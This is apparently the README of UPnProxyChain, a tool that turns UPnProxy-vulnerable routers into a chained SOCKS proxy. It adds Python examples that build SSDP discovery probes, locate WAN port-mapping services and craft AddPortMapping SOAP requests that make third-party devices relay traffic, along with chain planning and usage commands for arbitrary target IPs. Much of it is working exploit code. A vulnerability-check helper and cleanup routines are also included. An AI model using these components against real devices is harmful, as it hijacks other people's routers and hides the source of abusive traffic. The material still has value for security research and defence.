UPnProxyChain

A tool to create a SOCKS proxy server out of UPnProxy-vulnerable device(s). Writeup: https://shufflingbytes.com/posts/upnproxychain-a-tool-to-exploit-devices-vulnerable-to-upnproxy/


General information

UPnProxyChain is a tool to create a SOCKS proxy server out of UPnProxy-vulnerable device(s). The proxy transparently forwards every connection through the vulnerable devices, so any tool that speaks the SOCKS protocol can use the connection chain.

It takes a list of IP addresses to exploit as arguments. The addresses are chained in the order given, and every proxied connection passes through all of them.

After the chain has been built, it is tested end to end, and only then is the SOCKS proxy server started.

On exit, UPnProxyChain cleans up the chain: it deletes every port mapping it created on the hosts so they do not remain on the devices indefinitely. If the process is killed before the cleanup runs, the mappings stay in place and have to be removed by hand.
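To make the chain-and-cleanup description concrete, here is an added example (not UPnProxyChain's own code) that lays out the per-connection mappings one plausible way: each hop forwards an external port to the port just mapped on the hop after it, and the last hop forwards to the destination. The hop order, port numbers, addresses and the RFC 1918 LAN check are assumptions made for illustration.

```python
"""Plan the port mappings for one connection through a UPnProxy chain.

Added illustration, not UPnProxyChain's code. The layout is an assumption:
every link forwards one external port to the next link's freshly mapped
port, and the final link forwards to the real destination.
"""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

# Address ranges a correctly behaving IGD would accept as "internal clients".
LAN_NETWORKS = [ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


@dataclass(frozen=True)
class Mapping:
    device: str           # host whose WAN*Connection service gets the request
    external_port: int    # NewExternalPort opened on that device
    internal_client: str  # NewInternalClient: where the device forwards to
    internal_port: int    # NewInternalPort
    protocol: str = "TCP"


def plan_chain(hops, dest_host, dest_port, first_port=40000):
    """Mappings to create, last hop first.

    The last device must forward straight to the destination; each earlier
    device forwards to the external port just mapped on the device after it.
    Creating them in this order means every mapping's target already exists.
    """
    if not hops:
        raise ValueError("chain needs at least one hop")
    plan = []
    next_client, next_port = dest_host, dest_port
    for index, device in enumerate(reversed(hops)):
        ext = first_port + index
        plan.append(Mapping(device, ext, next_client, next_port))
        next_client, next_port = device, ext
    return plan


def entry_point(plan):
    """(host, port) the SOCKS server relays a client to: the first hop."""
    last = plan[-1]
    return last.device, last.external_port


def cleanup_order(plan):
    """Delete in reverse creation order (entry first), so no reachable entry
    point is left pointing at a mapping that is already gone."""
    return list(reversed(plan))


def is_upnproxy_mapping(m):
    """UPnProxy indicator: NewInternalClient is not a LAN address. A correct IGD
    only forwards to hosts on its own LAN; accepting anything else makes the
    device a relay."""
    addr = ip_address(m.internal_client)
    return not any(addr in net for net in LAN_NETWORKS)


if __name__ == "__main__":
    for m in plan_chain(["198.51.100.1", "203.0.113.2"], "192.0.2.10", 443):
        print(m, "relay" if is_upnproxy_mapping(m) else "lan")
```

The plan only covers the data path. Reaching hop k's UPnP control endpoint through hops 1..k-1 needs mappings of the same shape that target the UPnP port instead of the destination; that part is not modelled here.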

Requirements

  • Python3

Usage

  _   _ ___      ___                   ___ _         _
 | | | | _ \_ _ | _ \_ _ _____ ___  _ / __| |_  __ _(_)_ _
 | |_| |  _/ ' \|  _/ '_/ _ \ \ / || | (__| ' \/ _` | | ' \
  \___/|_| |_||_|_| |_| \___/_\_\_, |\___|_||_\__,_|_|_||_|
                                 |__/

  Author: Valtteri Lehtinen <[email protected]>
  Writeup: https://shufflingbytes.com/posts/upnproxychain-a-tool-to-exploit-devices-vulnerable-to-upnproxy/


usage: upnproxychain.py [-h] [-p PORT] [-l LISTENADDRESS] [-c] [-v] host [host ...]

A SOCKS proxy server that forwards traffic through a chain of exposed WANIP- or WANPPPConnection UPnP services

positional arguments:
  host                  hosts to use as proxy chain links in order

optional arguments:
  -h, --help            show this help message and exit
  -p PORT, --port PORT  port for SOCKS proxy to listen on
  -l LISTENADDRESS, --listenaddress LISTENADDRESS
                        address for SOCKS proxy to listen on
  -c, --check           only check for UPnProxy vulnerability
  -v, --verbose         increase output verbosity

Proxying through a single host

# start proxy
./upnproxychain.py <IP>

# use the proxy to curl example.com
curl socks5h://localhost:1080 http://example.com

Proxying through multiple hosts

# start proxy
./upnproxychain.py <IP1> <IP2> <IP3> <IP4> <IP5>

# use the proxy to curl example.com
curl socks5h://localhost:1080 http://example.com

Check host for vulnerability

./upnproxychain.py -v -c <IP>

How it works

The tool sends an SSDP M-SEARCH discover message to the target host to enumerate its UPnP services. A target with a flawed UPnP implementation answers on its WAN interface with a LOCATION header pointing to the XML document that describes its devices and services.

The tool then downloads that document, checks whether the target offers a WANPPPConnection or WANIPConnection service, and if so starts sending control requests to that service to inject port mappings, the forwarding entries the chain is built from.

A device may not answer the UDP discover message even though it is exploitable. For those cases, UPnProxyChain tries popular UPnP ports and well-known paths of service description documents and proceeds from there.

Some devices accept the injected mappings but cannot be used as relays, because a firewall in front of them blocks traffic to any port other than the ones already open.
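The three steps above (SSDP discovery, reading the device description, issuing SOAP port-mapping actions) worked through as an added example against constructed data. This is not UPnProxyChain's code: the SSDP reply, the description XML, the addresses and the fallback URL list are all assumptions made up for illustration.

```python
"""Discovery, description parsing and SOAP control for a UPnProxy check.

Added example, not UPnProxyChain's code. Every sample below (SSDP reply,
device description, addresses, fallback URL list) is constructed.
"""
import xml.etree.ElementTree as ET
from urllib.parse import urljoin

SSDP_HOST, SSDP_PORT = "239.255.255.250", 1900
IGD = "urn:schemas-upnp-org:device:InternetGatewayDevice:1"
WAN_SERVICES = (
    "urn:schemas-upnp-org:service:WANIPConnection:1",
    "urn:schemas-upnp-org:service:WANIPConnection:2",
    "urn:schemas-upnp-org:service:WANPPPConnection:1",
)


def build_msearch(search_target=IGD, mx=2):
    """SSDP M-SEARCH request. A standard request carries the multicast group in
    HOST; sent unicast to a WAN address, an exposed IGD still answers."""
    return ("M-SEARCH * HTTP/1.1\r\n"
            f"HOST: {SSDP_HOST}:{SSDP_PORT}\r\n"
            'MAN: "ssdp:discover"\r\n'
            f"MX: {mx}\r\nST: {search_target}\r\n\r\n").encode()


def parse_location(ssdp_response):
    """LOCATION header of an SSDP reply (header names are case-insensitive)."""
    head = ssdp_response.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    for line in head.split("\r\n")[1:]:
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "location":
            return value.strip()
    return None


def _local(tag):
    return tag.rsplit("}", 1)[-1]  # drop the XML namespace


def find_wan_control_url(description_xml, location):
    """(serviceType, absolute controlURL) of the first WAN*Connection service.
    Relative URLs resolve against URLBase if present, else against LOCATION."""
    root = ET.fromstring(description_xml)
    base = next((e.text for e in root.iter() if _local(e.tag) == "URLBase" and e.text), location)
    for svc in (e for e in root.iter() if _local(e.tag) == "service"):
        fields = {_local(c.tag): (c.text or "").strip() for c in svc}
        if fields.get("serviceType") in WAN_SERVICES:
            return fields["serviceType"], urljoin(base, fields["controlURL"])
    return None


def build_soap(service_type, action, args):
    """HTTP headers and body for one UPnP SOAP action on a WAN*Connection service."""
    inner = "".join(f"<{k}>{v}</{k}>" for k, v in args.items())
    body = ('<?xml version="1.0"?>'
            '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
            's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body>'
            f'<u:{action} xmlns:u="{service_type}">{inner}</u:{action}></s:Body></s:Envelope>')
    headers = {"Content-Type": 'text/xml; charset="utf-8"',
               "SOAPAction": f'"{service_type}#{action}"'}
    return headers, body


def add_port_mapping(service_type, ext_port, internal_client, internal_port, proto="TCP"):
    """The UPnProxy defect: the device accepts a NewInternalClient that is not on
    its LAN, so this mapping turns it into a relay towards internal_client."""
    return build_soap(service_type, "AddPortMapping", {
        "NewRemoteHost": "", "NewExternalPort": ext_port, "NewProtocol": proto,
        "NewInternalPort": internal_port, "NewInternalClient": internal_client,
        "NewEnabled": 1, "NewPortMappingDescription": "example", "NewLeaseDuration": 0})


def delete_port_mapping(service_type, ext_port, proto="TCP"):
    """Cleanup counterpart: remove what was added."""
    return build_soap(service_type, "DeletePortMapping",
                      {"NewRemoteHost": "", "NewExternalPort": ext_port, "NewProtocol": proto})


def candidate_description_urls(host):
    """Fallback when SSDP gets no answer. These port/path pairs are assumed
    examples of vendor defaults, not a list taken from the tool."""
    return [f"http://{host}:{p}{path}" for p, path in
            ((49152, "/rootDesc.xml"), (5000, "/rootDesc.xml"), (1900, "/igd.xml"))]


# Constructed sample data standing in for a real device's replies.
SAMPLE_SSDP_REPLY = (b"HTTP/1.1 200 OK\r\nCACHE-CONTROL: max-age=1800\r\n"
                     b"ST: urn:schemas-upnp-org:device:InternetGatewayDevice:1\r\n"
                     b"Location: http://203.0.113.5:49152/rootDesc.xml\r\n"
                     b"SERVER: Linux UPnP/1.0 ExampleRouter/1.0\r\n"
                     b"USN: uuid:00000000-0000-4000-8000-000000000001::upnp:rootdevice\r\n\r\n")
SAMPLE_DESCRIPTION = """<?xml version="1.0"?>
<root xmlns="urn:schemas-upnp-org:device-1-0"><device>
  <deviceType>urn:schemas-upnp-org:device:InternetGatewayDevice:1</deviceType>
  <deviceList><device><deviceType>urn:schemas-upnp-org:device:WANDevice:1</deviceType>
    <deviceList><device><deviceType>urn:schemas-upnp-org:device:WANConnectionDevice:1</deviceType>
      <serviceList><service>
        <serviceType>urn:schemas-upnp-org:service:WANIPConnection:1</serviceType>
        <serviceId>urn:upnp-org:serviceId:WANIPConn1</serviceId>
        <controlURL>/ctl/IPConn</controlURL><eventSubURL>/evt/IPConn</eventSubURL>
        <SCPDURL>/WANIPCn.xml</SCPDURL>
      </service></serviceList>
    </device></deviceList>
  </device></deviceList>
</device></root>"""

if __name__ == "__main__":
    stype, ctl = find_wan_control_url(SAMPLE_DESCRIPTION, parse_location(SAMPLE_SSDP_REPLY))
    print(ctl, add_port_mapping(stype, 40000, "192.0.2.10", 443)[1])
```

In a live check the M-SEARCH goes out over UDP to port 1900 of the target, the description is fetched with a plain HTTP GET, and the SOAP body is POSTed to the control URL with the two headers shown. A device is a UPnProxy case when the AddPortMapping above succeeds with an internal client outside its LAN; whether it is also usable as a relay depends on the firewall caveat in the section above.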

Limitations

  • The SOCKS proxy supports only the CONNECT command (no BIND or UDP ASSOCIATE), so only outbound TCP connections can be proxied.